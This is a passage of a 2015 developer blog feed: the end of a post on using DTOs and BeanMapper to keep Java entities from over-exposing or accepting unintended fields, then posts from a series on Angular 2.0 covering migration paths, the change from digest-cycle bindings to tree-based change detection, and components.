<p>Let us suppose that the domain requires that the overrideCode must not be exposed. Also, the owner is set once and may not be overwritten.</p>
<h3>Issue I - Clean the input</h3>
<p>By default, all fields from the JSON object will be mapped to the Entity. Therefore it is possible to:</p>
<ul>
<li>set your own ID and force and Entity to be merged on that basis</li>
<li>set an owner different from the one that Car had</li>
</ul>
<p>The application will then have to scrub the entity to make sure it was not passed values it should not be able to update. For example, the ID might have to be checked against the authorities of the current user and the owner field must be taken from the existing record if it already exists.</p>
<h3>Issue II - Clean the output</h3>
<p>When the object is mapped back to JSON, the secret code must be scrubbed from the output. This could be done by annotating the entity with JSON specific instructions to make sure the field is scrubbed.</p>
<p>Showing the related cars in the result, leads to a large JSON file with lots of data that is not appropriate for the calling system. This field must be scrubbed as well to prevent fetches of these records.</p>
<h3>Consciously scrubbing</h3>
<p>Bottom line is that the default is to pass everything, requiring a conscious decision on the side of the developer to scrub data, both for incoming and outgoing traffic.</p>
<p>Failing to foresee what must be scrubbed results in a failure to uphold an implicit contract, at best introducing mild data leakage and at worst critical security flaws.</p>
<h2>Solution - Mapping with intermediate objects</h2>
<p>It would be possible to work on the basis of Data Transfer Objects (DTOs). In this case JSON will be transformed into a Form (incoming DTO), before being transformed into an Entity. The Entity will be transformed into a Result (outgoing DTO), before being transformed into JSON.</p>
<img alt="mapping_with_intermediate_objects" width="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVbFuinCjulOaIi3vzK_6zzNrijmmLwEGRNYDvVVpRRYorWWJwocMZU6tIOwd_YU4Pi52U4kR_DqKt82tl7708ma-0ytO25OhXenFib418PMJp0Zefb7fAyvmkVtWTTWBZ9TX7G86x_B8_/s1600/mapping-with-forms-and-results.png" />
In our example, the Form looks like this:
<pre><code class="java">
public class CarForm {
public String overrideCode;
public String licensePlate;
}
</code></pre>
<p>ID is not passed, since this is a given. Owner is not passed either, since we decided it cannot be changed in our domain. Related cars are probably determined somewhere else in the application, so no use to pass those. The form becomes very simple and contains only what we need.</p>
<p>The Result looks like this</p>
<pre><code class="java">
public class CarResult {
public Long id;
public String licensePlate;
public String owner;
}
</code></pre>
<p>Now we do pass the ID, since it helps our consumer to retrieve the object or to initiate an update call. The overrideCode is dropped, because we do not want it to be exposed. Also, the related cars are dropped, because we do not want to trigger the fetches and we do not require them.</p>
<h2>New problem - Lots of manual mappings</h2>
<p>Regrettably, we now have a new problem. Our application becomes responsible for mapping from Result to Entity and from Entity to Form:</p>
<pre><code class="java">
// Mapping from Form to Entity
Car car = new Car();
car.setOverrideCode(form.overrideCode);
car.setLicensePlate(form.licensePlate);
// Mapping from Entity to Result
CarResult carResult = new CarResult();
carResult.id = car.getId();
carResult.licensePlate = car.getLicensePlate();
carResult.owner = car.getOwner();
</code></pre>
<img alt="manual_mapping" width="100%" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZmDHgUq_QDHP20CkQ0-T11aawCaadzkTg3oazUBUVk2YgGdLwwZ6NuHll2VDtS2tNWrgm30Q8BMHay7QWv6l5pIRjIWnjRK96Z_xhua6H70unwmLa-6Y_DD_PwWTLks-OAO8A9QJKB1Fh/s1600/manual-mapping.png" />
<p>This logic is very brittle, since for an Entity it will need to be maintained in two different places. It is no wonder that confronted by this situation, scrubbing does not seem so bad.</p>
<h2>Solution - Enter BeanMapper</h2>
<p>How about if mapping from Form to Entity and from Entity to Result can be done automatically? Let us suppose we have a tool that is able to map similar fields from dissimilar classes. In this case, it would be just a matter of passing both instances and delegating the task of mapping from source to target to this tool.</p>
<p><a href="http://beanmapper.io">BeanMapper</a> does just that:</p>
<pre><code class="java">
BeanMapper beanMapper = new BeanMapper();
// Mapping from Form to Entity
Car car = beanMapper.map(form, Car.class);
// Mapping from Entity to Result
CarResult carResult = beanMapper.map(car, CarResult.class);
</code></pre>
<p>Fields that do not exist, are simply not mapped. It does what you expect at virtually no cost. There are many ways you can configure and guide the BeanMapper, which is well beyond the scope of this article. If the above case sounds familiar to you, it is worth checking out <a href="http://beanmapper.io">BeanMapper</a></p>
<p><i>Later articles will show in-depth examples.</i></p>Anonymoushttp://www.blogger.com/profile/07839346688527113490noreply@blogger.com3tag:blogger.com,1999:blog-8962763253387334081.post-20871646873991153692015-08-13T14:00:00.000+02:002016-02-02T08:58:30.945+01:00The Road to Angular 2.0 part 6: Migration<h1>Intro</h1><br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<h1>Migration</h1><br />
<a href="http://blog.42.nl/articles/road-angular-2-0-pt-5-bindings/">Last week we discussed the new bindings system in Angular 2.0</a>, and we saw that by using trees Angular 2.0 applications use less memory and are faster than before.<br />
<br />
In this final instalment of this series, we are going to look at how we can migrate our Angular 1.x applications to Angular 2.0.<br />
<br />
<a name='more'></a><br />
<br />
<h1>The road to 2.0</h1><br />
How do you migrate an Angular 1.x app to Angular 2.0?<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/08/migration-questionmark.png"><img alt="migration-questionmark" class="size-full wp-image-1323 aligncenter" src="http://blog.42.nl/wp-content/uploads/2015/08/migration-questionmark.png" height="114" width="400" /></a></div><br />
The answer you might hope for is running some magical wizard in some fancy IDE that will take care of the process for you. Does such a magical solution exists? The answer, unfortunately, is no. There is no easy way to migrate your applications without doing some work yourself.<br />
<br />
<a href="https://www.youtube.com/watch?v=pai1ZdFI2dg">Here is a video from the ng-conf showing how you can migrate code from Angular 1.3 to Angular 2.0</a>. It is worth a view and shows the manual work required to upgrade an Angular application.<br />
<h1>A tale of two roads</h1><br />
The Angular team states that there are two roads to migrate an Angular 1.x app to 2.0: Big Bang and Incremental.<br />
<div style="text-align: center;"><a href="https://blog.42.nl/wp-content/uploads/2015/08/migration-options.png"><img alt="migration-options" class="size-full wp-image-1324 aligncenter" height="320" src="https://blog.42.nl/wp-content/uploads/2015/08/migration-options.png" width="585" /></a></div><br />
<br />
<h2>Big Bang</h2><br />
Big Bang is a migration path in which you halt all development on an application, and migrate an entire application to Angular 2.0 in one Big Bang.<br />
<br />
The biggest benefit of a Big Bang migration is that it is the fastest way to get to Angular 2.0. This means you can use al the cool new features such as components, TypeScript and the new Template syntax as soon as possible.<br />
<br />
Big Bang has a couple of drawbacks: first it might be difficult to convince your manager or product owner to freeze the product you are working on. Performing a Big Bang migration whilst the application is changing underneath your feet is not something I would recommend. So it is imperative that the application is frozen so the target does not move. Trying to sell this to your manager / product owner is going to be difficult.<br />
<br />
The second drawback is that the size of your application determines how easy it is to pull a Big Bang off. The larger your application the more time it will take to perform the Big Bang. The more time it takes to perform a Big Bang the more difficult it is to get the application freeze approved.<br />
<br />
The third drawback is that when you rely on third party libraries such as: <a href="https://angular-ui.github.io/bootstrap/">ui-bootstrap</a> or <a href="https://github.com/mgonto/restangular">restangular</a>, you will have to wait until they've upgraded to 2.0 as well. This means that you cannot perform a Big Bang until each and every one of your dependencies has upgraded to 2.0. Of course you could work around this problem by dropping a dependency and writing it yourself, but this can be a lot of work, especially if your application has "big" dependencies that do most of the work in your application.<br />
<h2>Incremental</h2><br />
Incremental is a migration path in which you update parts of your application with Angular 2.0 code, and keep parts of your code Angular 1.x code. This is possible because you can run Angular 2.0 applications and 1.x applications side by side.<br />
<br />
You can do this in two flavors: either you have an Angular 2.0 app which includes Angular 1.x app, or vice versa you have an Angular 1.x app which includes an Angular 2.0 app. This gives us the freedom to mix and match Angular 1.x and 2.0 as we please.<br />
<br />
For example: we can migrate everything from controllers to services to Angular 2.0, and keep some select directives Angular 1.3 such as ui-bootstrap. Another example is that we stick to Angular 1.x for our controllers and services, but write al of our new directives with Angular 2.0 components.<br />
<br />
The benefit of Incremental is that we have a lot of flexibility in how we migrate our applications to Angular 2.0. Just like the Big Bang migration path Incremental also has some drawbacks.<br />
<br />
The first drawback is that you will bundle Angular 1.x with 2.0, this means that the browser will have to download two complete frameworks, and parse two complete frameworks, this will impact the performance of your application negatively.<br />
<br />
The second drawback is that having two frameworks, Angular 1.x and 20, with two very different philosophies, will make your code will look like a <a href="https://en.wikipedia.org/wiki/Chimera_(mythology)">Chimera</a>, a strange hybrid that is stuck between two worlds, not a pretty picture. The only way to fix this is to eventually migrate to Angular 2.0 completely.<br />
<h2>Big Bang vs Incremental</h2><br />
The question you might ask so which is better Big Bang or Incremental? The answer is that it depends on the nature of your application and your projects circumstances. Here is a decision matrix:<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/08/angular-path-matrix.png"><img alt="angular-path-matrix" class=" wp-image-1328 aligncenter" src="http://blog.42.nl/wp-content/uploads/2015/08/angular-path-matrix.png" height="290" width="614" /></a></div><br />
Basically the matrix states that the smaller your application is the more Big Bang makes sense. This is because the time it takes to perform a Big Bang is directly related to the size of the application.<br />
<br />
Another facet in the decision is how many dependencies the application has. As stated before you can only upgrade to 2.0 completely when all your dependencies have upgraded. However some apps are more dependant on external dependencies than others, if you for example depend heavily on some big external Google Maps directive, it might make sense to wait until that directive has updated, and do an Incremental upgrade instead.<br />
<br />
The last facet of the matrix is the time you can "get" to migrate to Angular 2.0. This is really a circumstance which is more political than technical, it depends on management. If you get oceans of time to migrate, Big Bang makes more sense, if there is a focus on new features Incremental makes more sense.<br />
<h1>Preparing for 2.0</h1><br />
There are steps you can take to prepare for an migration to Angular 2.0. The closer you can get your 1.x application to the 2.0 philosophy the easier it is to migrate to Angular 2.0.<br />
<h2>Stop using $scope</h2><br />
In Angular 2.0 components will no longer have a '$scope', instead the instance of the component's controller will become the scope. To prepare for this change I recommend that you use the "<a href="http://toddmotto.com/digging-into-angulars-controller-as-syntax/">controllerAs</a>" syntax. This way you won't have $scope's that need to be removed when you migrate to 2.0.<br />
<h2>Upgrade to 1.4</h2><br />
Upgrading to 1.4.x: the latest stable version of Angular is a good step to take. Upgrading to 1.4 will make it easier to migrate to Angular 1.5, which brings me to my next point.<br />
<h2>Upgrade to 1.5 when it is released</h2><br />
The goal of Angular 1.5 is to make migrating from Angular 1.x to 2.0 easier. What the exact nature of these features are is still in flux. One feature that I'm personally rooting for is the "<a href="https://github.com/angular/angular.js/issues/10007">component helper</a>" function. This will make it easier to write directives that mimic Angular 2.0 components. By mimicking Angular 2.0 components Angular 1.5 will be closer to the philosophy of Angular 2.0, being closer to the Angular 2.0 philosophy makes migrating easier.<br />
<h2>Start using ES6 today!</h2><br />
Using a transpiler such as <a href="http://babeljs.io/">Babel</a> you can start writing ES6 today. A transpiler transforms ES6 code to ES5 code, so you application will run in todays browsers.<br />
<br />
The biggest benefit of ES6 is that it allows you to write "classes", Angular 2.0 will heavily rely on classes, Components are classes for example. By using classes to define services and directive's controllers you have already done some of the migration work.<br />
<h2>The new Component router</h2><br />
Angular 2.0 will have a new built in router called the <a href="https://angular.github.io/router/">Component Router</a> this router will, as its name suggests, routes on components, it will instantiate a component based on the current URL.<br />
<br />
The nice thing about the Component Router is that the router will be back ported to Angular 1.5. This means you can start using the new router in 1.5 and when you upgrade to Angular 2.0, migrating your routes is already done.<br />
<br />
If you use ui-router today instead of ngRoute, you might want to read up on the <a href="https://medium.com/angularjs-meetup-south-london/angular-just-another-introduction-to-ngnewrouter-vs-ui-router-72bfcb228017">differences between ui-router and the Component Router</a>.<br />
<br />
Note that the Component Router was called the ngNewRouter until a couple of months ago.<br />
<h1>A new Hope</h1><br />
At the <a href="https://angularu.com/ng/">AngularU conference key Angular core team members gave a keynote</a> in which they announced that Google has some internal tools to make migrating easier. They are in the process of evaluating which tools are useful to release to the Angular community. There isn't much information on these tools so there isn't much more to tell you, but there is some hope that migrating will easier, and more importantly partly automated.<br />
<h1>Starting new projects</h1><br />
I've often received the following question: "I'm starting a new project, should I wait for Angular 2.0, or should I start in Angular 1.4?" The answer is to just start using Angular 1.4, and migrate to 2.0 later.<br />
<br />
The reason for this is because Angular 1.x is not abandoned , in fact it is quite the opposite. The Angular team has been split into two teams: one team for 2.0 and one team for 1.x. The 1.x team even has a new project lead: <a href="https://twitter.com/petebd">Pete Bacon Darwin</a>, so 1.x if far from abandoned. With Angular 1.5's focus on migration from 1.x to 2.0, starting on 1.x and migrating to 2.0 will mean some work, but it will not be the end of the world, and if you follow my advice on preparing for 2.0 you will make migrating easier.<br />
<br />
Another reason not to wait for angular 2.0 is because it still doesn't have a release date, in fact there isn't even a beta available yet. Hopefully we will learn more at the <a href="http://angularconnect.com/">AngularConnect conference in London in October</a>, hopefully they will announce something more concrete than: "it is done when it is done".<br />
<h1>Conclusion</h1><br />
Now you know the somewhat painful truth that migrating from Angular 1.x to 2.0 is not going to happen by a click of the button. We have seen that the Angular team has put together two migration paths: Big Bang and Incremental. A Big Bang migration get your project to Angular 2.0 as quickly as possible. The Incremental migration allows us ton combine 1.x and 2.0 in the same application, so we can migrate step by step.<br />
<br />
We also know that we can prepare for Angular 2.0 by using a transpiler such as <a href="http://babeljs.io/">Babel</a> to start using ES6 classes in our Angular applications today. We should also upgrade our applications to the latests Angular 1.x version that is available, because that version is closest to Angular 2.0.<br />
<br />
The final takeaway of this blogpost is that Angular 1.x is not going anywhere anytime soon, it is still actively being maintained, and the community is still alive and kicking. So starting a project in Angular 1.x and migrating to 2.0 later is a valid strategy.<br />
<br />
I hope you enjoyed this series of blog posts and found them informative. Hopefully Angular 2.0 gets released soon, I think it will be a great leap forwards for us the Angular community.<br />
<br />
Anonymousnoreply@blogger.com35tag:blogger.com,1999:blog-8962763253387334081.post-51130532793048404152015-08-06T14:00:00.000+02:002016-02-25T11:33:21.288+01:00The Road to Angular 2.0 part 5: Bindings<h1>Intro</h1><br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<h1>Bindings</h1><br />
<a href="/2015/07/the-road-to-angular-20-part-4-components.html">Last week we discussed Components</a>, which showed us a fundamental new way to think about our Angular applications.<br />
<br />
This week we are going to look at bindings, aka the way Angular automagically updates values in our views. The Angular 2.0 team put a lot of effort in making this system faster. The team reports a speed increase that is 3x to 10x times faster than Angular 1.x.<br />
<br />
But something had to change fundamentally in order for this speed increase to be possible.<br />
<br />
<a name='more'></a><br />
<br />
<h1>Bindings in Angular 1.x</h1><br />
Before we can understand why Angular 2.0 is faster than 1.x, and how the Angular 2.0 team did it, we must first look at how Angular 1.x handles bindings.<br />
<h2>An Angular 1.x App</h2><br />
Let's begin with a fictive Angular 1.x app which has four bindings: A, B, C and D, these bindings have relationships (or dependencies) with each other as depicted in the the image below:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Angular1x-app.jpg"><img alt="Angular1x-app" class="alignnone size-full wp-image-1293" height="307" src="http://blog.42.nl/wp-content/uploads/2015/07/Angular1x-app.jpg" width="495" /></a><br />
<br />
This image above shows that binding A has a relationship to binding B and vice versa. This means that whenever A updates something might 'change' for component B, but it doesn't necessarily have to. The same is also true in reverse: when B changes A might also need an update.<br />
<br />
There can also be relationships that are 'one' sided, for example A only influences D but not the other way around<br />
<br />
Bindings can also have subtle relationships to other bindings indirectly: B has a relationship to binding D through binding C.<br />
<br />
The point is that relationships between bindings in Angular 1.x can become pretty complex. Even when you have only four bindings. So how does Angular 1.x know when to update a 'binding' and<br />
show a different value inside the UI? The answer is dirty checking.<br />
<h2>Dirty Checking</h2><br />
Dirty checking can be explained as follows: every time there might have been a change to the view, so whenever the user clicks on something, an $http request finishes, Angular will check the value of each binding and compare it to the old value. When the value is different between the two versions Angular will update the UI. When a value differs between it is considered 'dirty', hence the term 'dirty checking'. The phase in which Angular checks for changes is called the "digest phase".<br />
<br />
To make this example more concrete: let's say we have a variable called "age" and the value is currently 16. Then some event triggers the digest phase, now the new value of "age" is 17. Angular will compare 16 and 17 and it will say that a change has occurred and update the UI.<br />
<br />
But what if you have a binding that depends on another binding, how does that get updated? We know, as humans, what the 'relationship' between two bindings is, and which one depends on the other, so we know intuitively in which order to evaluate the bindings. But how does Angular know which binding to evaluate first?<br />
<br />
The answer is that Angular 1.x doesn't know anything about the relationships between 'bindings'. So it cannot know in which order to perform the 'dirty' checks. What Angular does instead is evaluate each binding until all bindings have stabilized, by stabilized I mean that they have stopped changing. Angular does this by running a "loop" that will evaluate each binding until the bindings “report” that they are stabilized.<br />
<br />
This "loop" is called the digest cycle, which is a part of the digest phase. The digest cycle will resolve all bindings until none of the bindings have reported a change between runs of the cycle. The digest cycle is a subpart of the digest phase:<br />
<div style="text-align: center;"><a href="http://blog.42.nl/wp-content/uploads/2015/07/Digest-Phase.jpg"><img alt="Digest-Phase" class="size-full wp-image-1294 aligncenter" height="182" src="http://blog.42.nl/wp-content/uploads/2015/07/Digest-Phase.jpg" width="259" /></a></div><br />
If you have two bindings with a relationship, it might occur that the digest cycle needs to run multiple times before both bindings no longer change. If the bindings does not stabilize after 10 cycles Angular gives up and you get an error. This magical limit of 10 is called the Time To Live, and you can even increase or decrease it if you want to.<br />
<br />
When the digest cycle reports to the digest phase that it is complete and that the system is stable, only then will Angular re-render the views.<br />
<br />
So to conclude: the digest cycle is a clever way for Angular 1.x to not know what your 'relationships' between bindings actually mean semantically, but still update those relationships in your UI correctly.<br />
<h1>What’s wrong with 1.x bindings?</h1><br />
The Angular 1.x way of resolving bindings, and their complex relationships, is a really great way to solve a very complex problem. However there are three downsides to the 1.x approach:<br />
<h2>Expensive</h2><br />
Resolving bindings with complex relationships by checking them in a digest cycle can lead to suboptimal performance. If you have a very complex application with multiple complex relationships between bindings, it may take Angular 1.x’s digest cycle multiple loops before it can report, to the digest phase, that the system has stabilized.<br />
<br />
In this sense resolving bindings can potentially become very expensive.<br />
<h2>Unpredictable</h2><br />
The system is also very unpredictable, if you gave me the following template:<br />
<pre><code class="javascript"><div ng-controller="PersonController as personController">
<h1>Hi {{ personController.person.name }}</h1>
<person-view person="personController.person"></person-view>
</div></code></pre><br />
And you would ask me: “How do the bindings get resolved, in this template?” I would not be able to give you an answer straight away. I would have to dive deep into the “PersonController” and into the “personView” directive before I can provide an answer, for instance what type of binging is “person” on personView? My answer would depending on what type of binding it is, but even I could not tell you how Angular would actually resolve the binding in the digest phase.<br />
<br />
Basically the Angular 1.x bindings system is not deterministic, if you gave it the same inputs it might take a different route each time to get to the outcome. This property of the system makes it difficult to reason about an Angular 1.x application.<br />
<h2>Unnecessary</h2><br />
<h3>Immutable</h3><br />
Bindings can sometimes even be unnecessary, consider the following: What if you know that a data structure never changes. For example: what if you rendered a menu based on an array of strings, and you knew that there was no possible way that array would ever change. In other words you know that you will never change the menu during the run of the application.<br />
<br />
Doing dirty checking on such an immutable (never changing) data structure is a pure waste of time. There is no way to tell Angular 1.x that this structure needs to be absolved from the digest phase, so it gets evaluated each and every time.<br />
<h3>Observable</h3><br />
Another situation can be that you have a component, which only changes when a specific event occurs. In other words the object will never change unless that particular event is fired. Again in Angular 1.x there is no way to tell the system that such a component exists. The system will dirty check that component even though we humans know it is futile.<br />
<h1>Bindings in Angular 2.0</h1><br />
Now that we know how Angular 1.x handles bindings, and we know some of its flaws, we can look at how Angular 2.0 mitigates these flaws and improves on the system. Before we can do that we must first look at the anatomy of an Angular 2.0 application, because last week we learned that Angular 2.0 will be a component based framework, how does being component based affect the binding system?<br />
<h2>Anatomy of an Angular 2.0 application</h2><br />
Lets say we have an application that provides us with weather information of various cities in the world. The application looks something like this:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/weather-app.jpg"><img alt="weather-app" class="alignnone wp-image-1295" height="394" src="http://blog.42.nl/wp-content/uploads/2015/07/weather-app.jpg" width="712" /></a><br />
<br />
The application consists of a Grid of WeatherStation’s each station consists of a name, temperature, humidity and an icon telling the current state of the weather. You can favorite a weather station by clicking on the “star” icon. Above the Grid are two bars, a SearchBar in which the user can filter the stations based on the name, and a SegmentedButton in which the user can toggle between All stations and the user’s favorite stations.<br />
<br />
This application is written in Angular 2.0 so therefore it is component based. Components are composable, which means components can be nested inside of each other. The weather app’s structure looks something like this:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/tree-components.jpg"><img alt="tree-components" class="alignnone wp-image-1298" height="340" src="http://blog.42.nl/wp-content/uploads/2015/07/tree-components.jpg" width="524" /></a><br />
<br />
Each component is a direct or indirect descendant of one “root” component, in this case the WeatherApp component. This leads to an important realization: Angular 2.0 applications are <b>trees!</b><br />
<h2>What is so great about trees?</h2><br />
Trees are very easy to understand, because the relationships between components are instantly obvious. Compare the image of the relationships between bindings in Angular 1.x with the image of the weather apps tree, the relationships in Angular 1.x could quickly run out of control.<br />
<br />
In Angular 2.0 there only exists one type of relationship between two components: A component can either be the parent of the other component, or a child of that component. In that relationship the parent component can send information down to the child component, and the child component can send events back to its parent.<br />
<br />
The relationships between components in Angular 2.0 can be codified as follows:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/bindings-codified.png"><img alt="bindings-codified" class="alignnone wp-image-1301" height="354" src="http://blog.42.nl/wp-content/uploads/2015/07/bindings-codified.png" width="509" /></a><br />
<br />
Having this property makes it very easy to reason about components when you encounter them in a template:<br />
<div title="Page 8"><br />
<pre><code class="javascript"><grid>
<div *for="#station of stations">
<station [station]="station"
(station-changed)="stationsDidChange()">
</station>
</div>
</grid></code></pre><br />
</div><br />
In the template is is immediately clear that the [station] binding comes from the parent, in this case from the Grid’s “stations” property. It is also simple to deduce that the “(station-changed)” event calls “stationDidChange()” on the Grid component, because Grid is the parent of the Station component. In Angular 2.0 you can read a template and instantly understand the relationships between components.<br />
<br />
The fact that Angular 2.0 applications are trees also influence the way the digest phase works. In 2.0 there is no more need for a digest cycle, because in order for Angular to resolve all the bindings it only needs to go from the top of the tree to the bottom of the tree once.<br />
<br />
The reason for this is simple: a component can only receive data ([] bindings) from its parent component, ergo a child component can only evaluate its bindings when his parent bindings are resolved. So a child must wait for its parent. A parent cannot receive data from his children, because bindings only go down, this means that child components bindings cannot influence the parent. In other words Angular only needs to reach the “bottom” of the tree and it is done.<br />
<br />
Here you can see the contrast between Angular 1.x and Angular 2.0’s change detection visually:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/change-detection-difference.png"><img alt="change-detection-difference" class="alignnone wp-image-1302" height="301" src="http://blog.42.nl/wp-content/uploads/2015/07/change-detection-difference.png" width="563" /></a><br />
<br />
I listed Angular 1.x’s bindings system downsides it as being expensive, unpredictable and unnecessary. Given what we now know about Angular 2.0 you can say its system is not expensive, because there is no digest cycle anymore, which can behave sub optimally. The system is now predictable because the flow of data and events is clearly defined, so we humans can reason with it better. But what about “unnecessary” can we stop Angular 2.0 from doing things we know are not needed? Yes we can!<br />
<h2>Change Detection</h2><br />
In Angular 2.0 we can take over the way Angular does change detection on a per component basis. This enables us to squeeze even more performance out of Angular 2.0 when it is absolutely needed.<br />
<br />
By default Angular 2.0 will generate a change detector “class” for each component at runtime. So if you have a component called WeatherStation Angular 2.0 will generate a WeatherStation_ChangeDetector class. This class will read the “meta” data about your component, so all inputs and outputs, and generates a class that will do the dirty checking. This is why you have to state all the input and output for your components.<br />
<br />
For example if the WeatherStation only has a “temperature” property this class might look something like this:<br />
<pre><code class="javascript">var temperature = obj.temperature;
if (temperature !== this.previousTemperature) {
this.previousTemperature = temperature;
this.weatherStation.temperature = temperature;
}</code></pre><br />
The reason Angular 2.0 generates such a specific “class” for every component is because JavaScript virtual machines (VM) can optimize the hell out of specific “code” way better than they can optimize “generic” code. In very technical terms VMs can optimize monomorphic code better than polymorphic code. <a href="http://mrale.ph/blog/2015/01/11/whats-up-with-monomorphism.html">Here is a great blogpost by Vyacheslav Egorov</a> explaining why this is true. Angular 1.x could not be optimized well by VMs because it used a polymorphic checking algorithm.<br />
<br />
Here's the kicker: you can tell Angular that you want to implement the _ChangeDetector class yourself. This enables us to write immutable components and observable components. In fact the “immutable” behavior comes built in with Angular 2.0.<br />
<br />
To make an component immutable you can do this:<br />
<pre><code class="javascript">@Component({
changeDetector: ON_PUSH
})</code></pre><br />
This means that the @Component will only run the change detection when new bindings are pushed into the component. So when the component never receives new bindings it is never part of the digest phase. Which means that Angular 2.0 will not waste time checking something that we know will not change.<br />
<br />
The cool thing about being able to set the way change detection works per component is that you can mix and match various strategies. Parts of your application can be immutable, parts can be “default” and some parts some exotic strategy you can come up with.<br />
<br />
This gives us some powerful tools to prevent Angular from doing “unnecessary” things, which slow our apps down.<br />
<br />
If you come out of this thinking you must declare your own “change detection” algorithm to get the performance boost Angular 2.0 promises you are wrong. Just the fact that Angular 2.0 applications are trees gives it a boost in performance alone. You can steer clear of defining you own strategies and it will still be fast, it is just there when you need it.<br />
<h1>Graph Time</h1><br />
<h2>Speed</h2><br />
By now you want to see a graph showing that Angular 2.0 is faster, so here you go:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Speed.png"><img alt="Speed" class="alignnone size-full wp-image-1305" height="399" src="http://blog.42.nl/wp-content/uploads/2015/07/Speed.png" width="471" /></a><br />
<br />
The graphs shows the performance of the same application written in various ways. On the left you see a red bar, which is a baseline application written in vanilla JavaScript. This baseline application is written in the most optimized (but ugly) JavaScript imaginable. It has zero levels of abstraction, every level of abstraction comes with a price in the form of less speed, so it is the fastest way to write a HTML application. The Angular 2.0 team uses this baseline application to see how fast they can get.<br />
<br />
The blue bar on the right represents Angular 1.3: it's 8.58 times slower than the baseline application. Next to that is Angular 2.0 in orange, this represents a “fresh” Angular 2.0 application. Next to that is a “green” bar which represents Angular 2.0 in a “hot” state, which means that it has cached some views.<br />
<br />
As you can see a “fresh” Angular 2.0 is 3 times faster than 1.x. What is even nicer is that the more you click through an Angular 2.0 application the faster it becomes, at least two times faster. Angular 2.0 will provide view caching for you automatically.<br />
<h2>Memory Pressure</h2><br />
The memory Angular 2.0 uses is also down dramatically as seen in this graph:<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/Memory.png"><img alt="Memory" class="alignnone size-full wp-image-1306" height="399" src="http://blog.42.nl/wp-content/uploads/2015/07/Memory.png" width="471" /></a><br />
<br />
Memory efficiency is increasingly important in this mobile world that we live in, mobile devices do not have as much memory as their desktop cousins. Angular 2.0 prides itself on being a mobile first framework, so they have to take their memory consumption seriously.<br />
<br />
The Angular 2.0 team announced at the <a href="https://www.youtube.com/watch?v=aHGmj_fqPLE">Angular U conference's keynote</a> that they are not done optimizing yet! So expect even more speed when 2.0 is finally released.<br />
<h1>Want to know more?</h1><br />
Victor Savkin a core contributor to the Angular project has some great blogposts about bindings:<br />
• <a href="http://victorsavkin.com/post/114168430846/two-phases-of-angular-2-applications">http://victorsavkin.com/post/114168430846/two-phases-of-angular-2-applications</a><br />
• <a href="http://victorsavkin.com/post/114168430846/two-phases-of-angular-2-applications">http://victorsavkin.com/post/110170125256/change-detection-in-angular-2</a><br />
• <a href="http://victorsavkin.com/post/114168430846/two-phases-of-angular-2-applications">Or you can watch Victor explain it in a twenty minute video.</a><br />
<h1>Conclusion</h1><br />
To make Angular 2.0 faster than ever, the nature of an Angular application had to change from a cyclic graph, to a tree. A cyclic graph is by nature very complex, it can point to everything from anything, a tree is nice and simple and only points down. Having a tree makes Angular 2.0 applications easer to reason about. The speed and memory pressure graphs speak for themselves, the Angular team have outdone themselves, and they are not finished yet.<br />
<br />
We have walked to Road to Angular 2.0 now and we have seen most area's in which Angular 2.0 is different from Angular 1.x. What we haven't talked about is how to cross the Rubicon ourselves: how de we migrate our own Angular 1.x applications to Angular 2.0. That is the topic of the final installment of this series.Anonymousnoreply@blogger.com0tag:blogger.com,1999:blog-8962763253387334081.post-76157937412061999982015-07-30T14:00:00.000+02:002015-12-29T13:29:57.643+01:00The Road to Angular 2.0 part 4: Components<h1>
Intro</h1>
<br />
I gave a presentation at the <a href="http://gotoams.nl/">GOTO conference in Amsterdam</a> titled: The Road to Angular 2.0. In this <a href="http://gotocon.com/amsterdam-2015/presentation/The%20Road%20to%20Angular%202.0">presentation</a>, I walked the Road to Angular 2.0 to figure out why Angular 2.0 was so different from 1.x.<br />
<br />
This series of blogposts is a follow up to that presentation.<br />
<br />
<a href="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular5.png"><img alt="theroadtoangular5" class="alignnone size-full wp-image-1186" height="300" src="http://blog.42.nl/wp-content/uploads/2015/07/theroadtoangular5.png" width="615" /></a><br />
<h1>
Components</h1>
<br />
<a href="http://blog.42.nl/articles/road-angular-2-0-pt-3-types/">Last week we took a look at TypeScript </a>and how it is going to improve our productivity. That combined with the posts about the new template syntax and the post about ES6, gives us a good perspective on how our Angular 2.0 is going to be written.<br />
<br />
This week’s post is about Components, and unlike the previous weeks topics, components changes the way we think about our Angular 2.0 applications, not just how we write Angular.<br />
<br />
Lets start by looking what a component actually is.<br />
<br />
<a name='more'></a><br /><br />
<h1>
What is a component?</h1>
<br />
A component in Angular is defined as a class which has both a Controller and a View. In Angular 2.0 your entire application will consist of Components that work together and build on top of each other.<br />
<br />
Officially an Angular 2.0 component is called a "Component Directive" but we will use the term "Component" because it is used more often.<br />
<br />
This is what a component looks like:<br />
<pre><code class="javascript">import {Component, View} from 'angular2/angular2';
@Component({
selector: 'person'
})
@View({
template: `My name: {{ name }}`
})
class PersonComponent {
name: string;
friends: Array;
constructor(name: string) {
this.name = name;
}
}</code></pre>
<br />
